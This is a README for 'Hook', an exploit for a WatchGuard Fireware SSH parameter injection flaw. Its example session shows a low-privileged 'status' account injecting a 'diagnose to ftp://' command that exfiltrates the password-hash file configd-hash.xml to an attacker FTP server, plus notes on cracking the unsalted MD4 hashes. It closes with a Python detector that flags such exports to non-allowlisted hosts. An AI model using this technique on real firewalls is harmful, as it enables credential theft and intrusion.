# Hook

Hook exploits a parameter injection vulnerability in the WatchGuard SSH interface. The vulnerability allows a low-privileged user to exfiltrate arbitrary system files to an attacker-controlled FTP server. Fortunately, there is a built-in low-privileged user named `status` that this script defaults to. It isn't unreasonable to assume that the `status` user will use a password of `readonly`, but it isn't required.

Hook exfiltrates the user file `configd-hash.xml`. This file contains hashed user passwords. The hashes are simply unsalted MD4. [@funoverip]( [described]( using hashcat to crack the hashes in this file all the way back in 2013.

## Example Usage

```
albinolobster@ubuntu:~/hook$ python3 --lhost --rhost
   0101010001101000 0110010100100000 0110100001101111
   0110111101101011 0010000001100010 0111001001101001
    ,ggg,        gg                                     
   dP""Y8b       88                           ,dPYb,    
   Yb, `88       88                           IP'`Yb    
    `"  88       88                           I8  8I   
        88aaaaaaa88                           I8  8bgg, 
        88"""""""88    ,ggggg,     ,ggggg,    I8 dP" "8 
        88       88   dP"  "Y8ggg dP"  "Y8ggg I8d8bggP" 
        88       88  i8'    ,8I  i8'    ,8I   I8P' "Yb, 
        88       Y8,,d8,   ,d8' ,d8,   ,d8'  ,d8    `Yb,
        88       `Y8P"Y8888P"   P"Y8888P"    88P      Y8
   0110111001100111 0111001100100000 0111100101101111
   0111010100100000 0110001001100001 0110001101101011

[+] Spinning up FTP server thread
[I 2022-06-16 12:58:39] concurrency model: async
[I 2022-06-16 12:58:39] masquerade (NAT) address: None
[I 2022-06-16 12:58:39] passive ports: None
[I 2022-06-16 12:58:39] >>> starting FTP server on, pid=19473 <<<
diagnose to ftp://r7:1270/r7
-- WatchGuard Fireware OS Version 12.1.3.B658867
-- Support:
-- Copyright (C) 1996-2022 WatchGuard Technologies Inc.
WG>diagnose to ftp://r7:1270/r7
[I 2022-06-16 12:58:46][] FTP session opened (connect)
[I 2022-06-16 12:58:46][albinolobster] USER 'albinolobster' logged in.
[I 2022-06-16 12:58:46][albinolobster] STOR /home/albinolobster/hook/configd-hash.xml completed=1 bytes=249 seconds=0.001
[I 2022-06-16 12:58:46][albinolobster] FTP session closed (disconnect).

[!] Done
albinolobster@ubuntu:~/hook$ file configd-hash.xml 
configd-hash.xml: gzip compressed data, max speed, from Unix, original size modulo 2^32 587
albinolobster@ubuntu:~/hook$ mv configd-hash.xml configd-hash.xml.gz
albinolobster@ubuntu:~/hook$ gunzip configd-hash.xml.gz 
albinolobster@ubuntu:~/hook$ cat configd-hash.xml 
<?xml version="1.0"?>
  <user name="admin">
    <role>Device Administrator</role>
  <user name="status">
    <role>Device Monitor</role>
  <user name="wg-support">
    <role>Device Monitor</role>
```
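The session above shows the one observable the firewall side gives a defender: the CLI echoes the injected `diagnose to ftp://...` command, so a recorded SSH session (from a bastion, a session recorder, or the management host's own logs) will contain that line. The following detector is an added example written for this README and is not part of Hook or of any WatchGuard tooling. It assumes session transcripts are available as plain text lines in the shape shown above, that the `WG>` prompt may or may not be present, and that the organisation keeps an allowlist of FTP hosts to which diagnostic exports are legitimate (the allowlist host below is a placeholder). Any `diagnose to ftp://` export to a host outside that allowlist, especially one by a read-only account such as `status`, is flagged.

```python
import re
from urllib.parse import urlsplit

# Placeholder allowlist of hosts to which "diagnose to ftp://" exports are
# expected (assumption: maintained by the organisation, not by WatchGuard).
ALLOWED_FTP_HOSTS = {"support-ftp.example.internal"}

# Matches the Fireware CLI echo of a diagnose-to-ftp command, with or without
# the "WG>" prompt, e.g. "WG>diagnose to ftp://r7:1270/r7" from the session above.
DIAGNOSE_FTP_RE = re.compile(r"^(?:WG>)?\s*diagnose\s+to\s+(ftp://\S+)", re.IGNORECASE)


def check_line(line):
    """Return a finding dict for a diagnose-to-ftp export to a non-allowlisted
    host, or None when the line is not such a command (or the host is allowed)."""
    match = DIAGNOSE_FTP_RE.search(line.strip())
    if not match:
        return None
    url = match.group(1)
    parts = urlsplit(url)
    host = (parts.hostname or "").lower()
    try:
        port = parts.port  # None when no explicit port; ValueError if malformed
    except ValueError:
        port = None
    if host in ALLOWED_FTP_HOSTS:
        return None
    return {
        "url": url,
        "host": host,
        "port": port,
        "path": parts.path,
        "reason": "diagnose-to-ftp export to non-allowlisted host",
    }


def scan_session(lines):
    """Scan an iterable of transcript lines and return all findings in order."""
    findings = []
    for number, line in enumerate(lines, start=1):
        finding = check_line(line)
        if finding is not None:
            finding["line"] = number
            findings.append(finding)
    return findings


# Constructed sample transcript for demonstration; the "r7:1270" command is
# the one echoed in the session above, the allowlisted export is invented.
SAMPLE_SESSION = """\
-- WatchGuard Fireware OS Version 12.1.3.B658867
WG>show system
WG>diagnose to ftp://support-ftp.example.internal/case-123
WG>diagnose to ftp://r7:1270/r7
WG>exit
"""


if __name__ == "__main__":
    for f in scan_session(SAMPLE_SESSION.splitlines()):
        print(f"line {f['line']}: {f['reason']} host={f['host']} port={f['port']} url={f['url']}")
```

The regex deliberately keys on the command keyword rather than on the file name: the same parameter injection can carry any system file, and `configd-hash.xml` is only the one Hook chooses. Feeding the detector a live transcript stream (one line at a time through `check_line`) works the same way as the batch `scan_session` call.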

## Credit

* [Blues Traveler](